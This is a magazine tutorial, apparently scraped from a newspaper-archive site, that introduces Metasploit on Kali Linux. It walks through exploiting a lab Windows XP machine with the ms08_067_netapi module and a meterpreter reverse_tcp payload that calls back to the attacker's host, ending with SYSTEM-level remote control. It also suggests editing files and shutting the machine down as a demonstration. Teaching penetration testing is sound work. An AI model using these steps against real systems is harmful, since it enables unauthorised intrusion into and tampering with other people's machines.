Linux Format

Metasploit­ation

No computer program is perfect and it’s not possible to predict every output for every input as neither humans nor computers are omniscient.

-

It’s a rare piece of code that never requires patching to fix some flaw or other that allows users to do what they were never meant to do. Exploits can be as simple as checking out plain text password files in an unprotecte­d directory, or inputting something akin to the Konami code. It can be spamming a password field until it breaks, or writing more data to a memory buffer than it can hold.

Hackers have been hacking since before the first computers were networked together with bits of string and sticky tape. Generally, this involves poking things until they break, and then poking them again. Occasional­ly, it involves the careful inspection of code to see whether there are any obvious flaws that developers have missed. This is one of the great arguments both for and against open source software. Yes, evil hackers can inspect your code for vulnerabil­ities, but so can everyone else, and the sooner it’s seen, the sooner it can be fixed.

Over the years, hackers have uncovered tens of thousands of individual vulnerabil­ities in software, and developed exploits that you can use to take advantage of them, giving you privilege escalation and perhaps even complete control over an entire machine.

Keeping track of these individual hacks, cracks and exploits is difficult, and the last thing you want when sneaking around a megacorp is to have to go and consult the exploit index cards you keep in a locked filing cabinet in your secret lair.

The Metasploit framework is maintained by security company Rapid 7 in order to help catalogue, develop and rapidly execute code against a target you’ve previously identified.

Like all such security tools, the Metasploit framework should only be used for penetratio­n testing and ensuring that any holes it uncovers are plugged – however, it’s not altogether outside the bounds of possibilit­y that bad actors use it in the wild to get up to no good.

The WordPress install we set up on the previous pages is fresh, up to date and, so far as anyone can tell, contains no vulnerabil­ities. It isn’t invulnerab­le, of course, but those vulnerabil­ities have yet to be discovered. After WordPress patches them, exploits to take advantage of the flaws will eventually end up as part of the Metasploit framework. Site owners who haven’t kept up to date with patches will fall victim to attacks, and soon find their precious pages distributi­ng malware to visitors.

We’re unsure of Future’s policies on publishing tutorials on how to actively attack the world’s most popular content management system, but we’re pretty sure it doesn’t look too kindly on it.

Instead, we’ve spun up a copy of Windows XP Profession­al SP3 – released in 2009, and with security

patches and updates running to 2015. Surprising­ly, Windows XP is still in use, and as of October 2022, 1.27% of all PCs were running the 22-year-old OS, giving it a larger market share than Windows 11.

Our target machine is running utilities typical of the time, including Firefox v40.03, FlashPlaye­r v18.0.0.232

and Microsoft’s .NET framework v2015.9.10. It is, in short, a target-rich environmen­t, and one which while not especially common in 2023, is certainly still around.

After attaching to the same local network as our Windows XP machine, we donned our black hoodies, and got to work.

To find the IP address of the target machine, run:

$ sudo netdiscove­r -r 192.168.0.0/24

Take a note of the machine’s IP address, because you’ll need it in a minute.

Start the Metasploit console by either selecting it from your system menu or entering msfconsole and wait while it sets up the database and displays an entertaini­ng CowSay.

If this is your first time running Metasploit, it’s worthwhile entering help to see what’s available to you and view some example commands. To use a Metasploit exploit, enter use followed by the path to the exploit you want.

Before you can do this, decide which aspect of Windows you want to attack. To find a suitable attack surface, you can use the search function to see what’s available. For instance:

$ search exploit/windows

Alternativ­ely you can browse through https://github. com/rapid7/metasploit-framework/tree/master/ documentat­ion/modules/exploit/windows.

Take your time and read the documentat­ion. We decided on the ms08_067_netapi, as it has a reputation for reliabilit­y, and will allow us to gain access as SYSTEM – the highest Windows privilege level. When you’re ready, enter:

$ use exploit/windows/smb/ms08_067_netapi

As you haven’t configured a payload, Metasploit

selects the default for you: windows/meterprete­r/ reverse_tcp . The prompt turns red. Type show options .

You’ll need to set the target machine’s IP address, so now enter:

$ set RHOST target.ip.address

The Exploit Target should already be set to 0 for automatic targeting. If it isn’t, enter:

$ set TARGET 0 $ set PAYLOAD path/to/payload

However, we’re happy with the default choice. LHOST is your IP address and will be embedded within the payload to ensure that your malware can phone home. Find your IP address with ifconfig .

Now set the LHOST with:

$ set LHOST your.ip.address

You’re now ready to start your attack. Draw the curtains, don your dark glasses, and enter exploit .

You’ll see a message that a session has been opened, and the prompt will change yet again, showing that you’re in a Meterprete­r session. You’re actually inside someone else’s Windows PC. Type: ? to access the help menu to see what you can get up to while you’re there.

If you’re showing off to a friend, to demonstrat­e just how insecure Windows XP really is in 2023, editing the contents of files and then turning the machine off should provide ample evidence that no, you’re not paranoid, and it really is dangerous out there.

But we deliberate­ly chose an obsolete OS on which to perform our penetratio­n tests, and it’s unlikely that you or anyone you know is still using Windows XP. Browse through the available exploits and you’ll see that it’s not just antique Microsoft products at risk. The most recent exploits you can deploy against Windows were added under a week ago. If you think you’re safe with a slightly out-of-date Linux system, think again. There’s a ton of exploits that can be used for privilege escalation with the express purpose of giving you a headache and eventually stealing your cash.

If you fancy your hand at more esoteric hacking, you’ll also be able to run attacks against such diverse operating systems as BSD, Solaris, Android, iOS and even mainframes. Congratula­tions – you are now a script kiddie.

?? ?? If your desktop looks like this, you’re probably going to have a bad time – unless it’s because you’re running Kali undercover and trying to look cool like it’s 2002.
If your desktop looks like this, you’re probably going to have a bad time – unless it’s because you’re running Kali undercover and trying to look cool like it’s 2002.
?? ??
?? ?? If you decide not to go with the default payload, you can choose a different one with: The array of tools available to you is truly staggering. If a vulnerabil­ity exists, Kali probably has an exploit that can abuse it. The wallpaper selection is good, too.
If you decide not to go with the default payload, you can choose a different one with: The array of tools available to you is truly staggering. If a vulnerabil­ity exists, Kali probably has an exploit that can abuse it. The wallpaper selection is good, too.
?? ?? With Metasploit on Kali Linux, you can take complete control of an old Windows box in a matter of minutes. Why you’d want to is beyond us.
With Metasploit on Kali Linux, you can take complete control of an old Windows box in a matter of minutes. Why you’d want to is beyond us.
?? ??

Newspapers in English

Newspapers from Australia